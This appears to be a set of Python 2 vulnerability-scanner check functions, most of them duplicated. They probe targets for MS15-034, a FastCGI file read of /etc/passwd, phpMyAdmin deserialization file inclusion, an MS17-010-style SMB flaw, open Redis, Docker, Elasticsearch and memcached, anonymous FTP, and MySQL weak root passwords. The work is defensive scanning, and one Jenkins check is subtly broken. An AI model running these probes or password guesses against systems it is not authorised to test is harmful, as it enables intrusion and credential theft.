def verify(self):
try:
ip = url2ip(self.target)
hexAllFfff = "18446744073709551615"
req1 = "GET /HTTP/1.0\r\n\r\n"
req = "GET /HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(5)
client_socket.connect((ip, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" in boringResp:
client_socket.close()
client_socket = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
client_socket.connect((ip, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested RangeNot Satisfiable" in goodResp:
self.result['status'] = True
self.result['info'] = '目标存在http.sys溢出漏洞'
except:
pass
def verify(self):
socket.setdefaulttimeout(5)
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
host = url2ip(self.target)
client_socket.connect((host, 9000))
data = """
01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53
54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52
56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50
2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49
50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f
70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
"""
data_s = ''
for _ in data.split():
data_s += chr(int(_, 16))
client_socket.send(data_s)
ret = client_socket.recv(1024)
if ret.find(':root:') > 0:
self.result['status'] = True
self.result['info'] = '目标存在Fast Cgi漏洞'
except:
pass
finally:
client_socket.close()
def verify(self):
socket.setdefaulttimeout(5)
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
host = url2ip(self.target)
client_socket.connect((host, 9000))
data = """
01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53
54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52
56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50
2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49
50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f
70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
"""
data_s = ''
for _ in data.split():
data_s += chr(int(_, 16))
client_socket.send(data_s)
ret = client_socket.recv(1024)
if ret.find(':root:') > 0:
self.result['status'] = True
self.result['info'] = '目标存在Fast Cgi漏洞'
except:
pass
finally:
client_socket.close()
def verify(self):
target_url = "http://"+ url2ip(self.target)+ ":9200/_nodes/stats"
r = requests.get(url=target_url,timeout=2)
if r.status_code == 200:
self.result['status'] = True
self.result['info'] = '目标存在Elasticsearch未授权访问'
else:
pass
def verify(self):
target_url = "http://" + url2ip(self.target) + ":9200/_nodes/stats"
r = requests.get(url=target_url, timeout=2)
if r.status_code == 200:
self.result['status'] = True
self.result['info'] = '目标存在Elasticsearch未授权访问'
else:
pass
def verify(self):
host = url2ip(self.target)
valurl = "http://%s:2375/version" % host
r = requests.get(valurl,timeout=5)
res = r.text
if res.find('ApiVersion') <> -1:
self.result['info'] = True
self.result['info'] = "目标%s 存在docker remote API未授权访问导致远程命令执行,验证地址:%s" % (self.target,valurl)
def verify(self):
ip_addr = url2ip(self.target)
try:
r = redis.Redis(host=ip_addr, port=6379, db=0,socket_timeout=3)
r.ping()
self.result['status'] = True
self.result['info'] = '%s目标存在redis未授权访问' % self.target
except Exception, e:
pass
def verify(self):
ip_addr = url2ip(self.target)
try:
r = redis.Redis(host=ip_addr, port=6379, db=0, socket_timeout=3)
r.ping()
self.result['status'] = True
self.result['info'] = '%s目标存在redis未授权访问' % self.target
except Exception, e:
pass
def verify(self):
host = url2ip(self.target)
valurl = "http://%s:2375/version" % host
r = requests.get(valurl, timeout=5)
res = r.text
if res.find('ApiVersion') <> -1:
self.result['info'] = True
self.result[
'info'] = "目标%s 存在docker remote API未授权访问导致远程命令执行,验证地址:%s" % (
self.target, valurl)
def verify(self):
s = socket.socket()
socket.setdefaulttimeout(5)
try:
host = url2ip(self.target)
port = 11211
s.connect((host, port))
self.result['status'] = True
self.result['info'] = '%s目标存在memcached未授权访问' % self.target
except Exception,e:
pass
def verify(self):
s = socket.socket()
socket.setdefaulttimeout(5)
try:
host = url2ip(self.target)
port = 11211
s.connect((host, port))
self.result['status'] = True
self.result['info'] = '%s目标存在memcached未授权访问' % self.target
except Exception, e:
pass
def verify(self):
s = socket.socket()
socket.setdefaulttimeout(5)
try:
host = url2ip(self.target)
port = 873
s.connect((host, port))
self.result['status'] = True
self.result['info'] = '%s目标开放rsync端口' % self.target
except Exception,e:
pass
def verify(self):
s = socket.socket()
socket.setdefaulttimeout(5)
try:
host = url2ip(self.target)
port = 873
s.connect((host, port))
self.result['status'] = True
self.result['info'] = '%s目标开放rsync端口' % self.target
except Exception, e:
pass
def verify(self):
win_payload = 'configuration=O:10:"PMA_Config":1:{s:6:"source";s:18:"c:/windows/win.ini";}&action=test'
linux_payload = 'configuration=O:10:"PMA_Config":1:{s:6:"source";s:11:"/etc/passwd";}&action=test'
host = url2ip(self.target)
if self.isPhpMyadmin(self.target+'/phpmyadmin'):
valurl = self.target+'/phpmyadmin/scripts/setup.php'
elif self.isPhpMyadmin(self.target):
valurl = self.target + '/scripts/setup.php'
else:
return
self.result['status'] = True
self.result['info'] = '目标存在phpmyadmin任意文件包含漏洞,验证url:%s' % valurl
def verify(self):
win_payload = 'configuration=O:10:"PMA_Config":1:{s:6:"source";s:18:"c:/windows/win.ini";}&action=test'
linux_payload = 'configuration=O:10:"PMA_Config":1:{s:6:"source";s:11:"/etc/passwd";}&action=test'
host = url2ip(self.target)
if self.isPhpMyadmin(self.target + '/phpmyadmin'):
valurl = self.target + '/phpmyadmin/scripts/setup.php'
elif self.isPhpMyadmin(self.target):
valurl = self.target + '/scripts/setup.php'
else:
return
self.result['status'] = True
self.result['info'] = '目标存在phpmyadmin任意文件包含漏洞,验证url:%s' % valurl
def verify(self):
socket.setdefaulttimeout(5)
try:
host = url2ip(self.target)
ftp = ftplib.FTP()
ftp.connect(host, 21)
ftp.login()
# ftp.retrlines('LIST')
ftp.quit()
self.result['status'] = True
self.result['info'] = '目标存在FTP匿名登录漏洞'
except:
pass
def verify(self):
socket.setdefaulttimeout(5)
try:
host = url2ip(self.target)
ftp = ftplib.FTP()
ftp.connect(host, 21)
ftp.login()
# ftp.retrlines('LIST')
ftp.quit()
self.result['status'] = True
self.result['info'] = '目标存在FTP匿名登录漏洞'
except:
pass
def verify(self):
host = url2ip(self.target)
url1 = "http://" + host + ":8080/"
url2 = "http://" + host + ":8080/jenkins/"
r = requests.get(url1,timeout=5)
if r.text.find("Jenkins") <> -1:
self.result['status'] = True
self.result['info'] = "可能存在Jenkins漏洞,验证url:%s" % url1
return
r2 = requests.get(url2,timeout=5)
if r2.text.find("Jenkins") <> -1:
self.result['status'] = True
self.result['info'] = "可能Jenkins漏洞,验证url:%s" % url1
return
def verify(self):
host = url2ip(self.target)
url1 = "http://" + host + ":8080/"
url2 = "http://" + host + ":8080/jenkins/"
r = requests.get(url1, timeout=5)
if r.find("Jenkins") <> -1:
self.result['status'] = True
self.result['info'] = "可能存在Jenkins漏洞,验证url:%s" % url1
return
r2 = requests.get(url2, timeout=5)
if r2.find("Jenkins") <> -1:
self.result['status'] = True
self.result['info'] = "可能Jenkins漏洞,验证url:%s" % url1
return
def verify(self):
ip = url2ip(self.target)
negotiate_protocol_request = binascii.unhexlify(
"00000054ff534d4272000000001801280000000000000000000000000000729c0000c4e1003100024c414e4d414e312e3000024c4d312e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200"
)
session_setup_request = binascii.unhexlify(
"0000008fff534d4273000000001801280000000000000000000000000000729c0000c4e10cff000000dfff0200010000000000310000000000d400008054004e544c4d5353500001000000050208a2010001002000000010001000210000002e3431426c7441314e505974624955473057696e646f7773203230303020323139350057696e646f7773203230303020352e3000"
)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((ip, 445))
s.send(negotiate_protocol_request)
s.recv(1024)
s.send(session_setup_request)
data = s.recv(1024)
user_id = data[32:34]
session_setup_request_2 = binascii.unhexlify(
"00000150ff534d4273000000001801280000000000000000000000000000729c"
+ binascii.hexlify(user_id) +
"c4e10cff000000dfff0200010000000000f200000000005cd0008015014e544c4d53535000030000001800180040000000780078005800000002000200d000000000000000d200000020002000d200000000000000f2000000050208a2ec893eacfc70bba9afefe94ef78908d37597e0202fd6177c0dfa65ed233b731faf86b02110137dc50101000000000000004724eed7b8d2017597e0202fd6177c0000000002000a0056004b002d005000430001000a0056004b002d005000430004000a0056004b002d005000430003000a0056004b002d00500043000700080036494bf1d7b8d20100000000000000002e003400310042006c007400410031004e005000590074006200490055004700300057696e646f7773203230303020323139350057696e646f7773203230303020352e3000"
)
s.send(session_setup_request_2)
s.recv(1024)
session_setup_request_3 = binascii.unhexlify(
"00000063ff534d4273000000001801200000000000000000000000000000729c0000c4e10dff000000dfff02000100000000000000000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000"
)
s.send(session_setup_request_3)
data = s.recv(1024)
tree_id = data[32:34]
smb = self.get_tree_connect_request(ip, tree_id)
s.send(smb)
s.recv(1024)
poc = binascii.unhexlify(
"0000004aff534d422500000000180128000000000000000000000000" +
binascii.hexlify(user_id) + "729c" + binascii.hexlify(tree_id) +
"c4e11000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00"
)
s.send(poc)
data = s.recv(1024)
# print data.encode('hex')
if "\x05\x02\x00\xc0" in data:
self.result['status'] = True
self.result['info'] = "目标存在SMB远程溢出"
s.close()
def verify(self):
s = socket.socket()
socket.setdefaulttimeout(5)
try:
host = url2ip(self.target)
port = 3306
s.connect((host, port))
s.close()
pwd = ["","123456","root","a123456","5201314","111111"]
for p in pwd:
errCode = self.crack(host,p)
if errCode == 200:
self.result['status'] = True
self.result['info'] = '%s目标存在MySQL弱口令 ,用户名为root,密码为%s' % (self.target,p)
break
elif errCode == 1045:
continue
else:
break
except Exception,e:
pass
def verify(self):
s = socket.socket()
socket.setdefaulttimeout(5)
try:
host = url2ip(self.target)
port = 3306
s.connect((host, port))
s.close()
pwd = ["","123456","root","a123456","5201314","111111"]
for p in pwd:
errCode = self.crack(host,p)
if errCode == 200:
self.result['status'] = True
self.result['info'] = '%s目标存在MySQL弱口令 ,用户名为root,密码为%s' % (self.target,p)
break
elif errCode == 1045:
continue
else:
break
except Exception,e:
pass
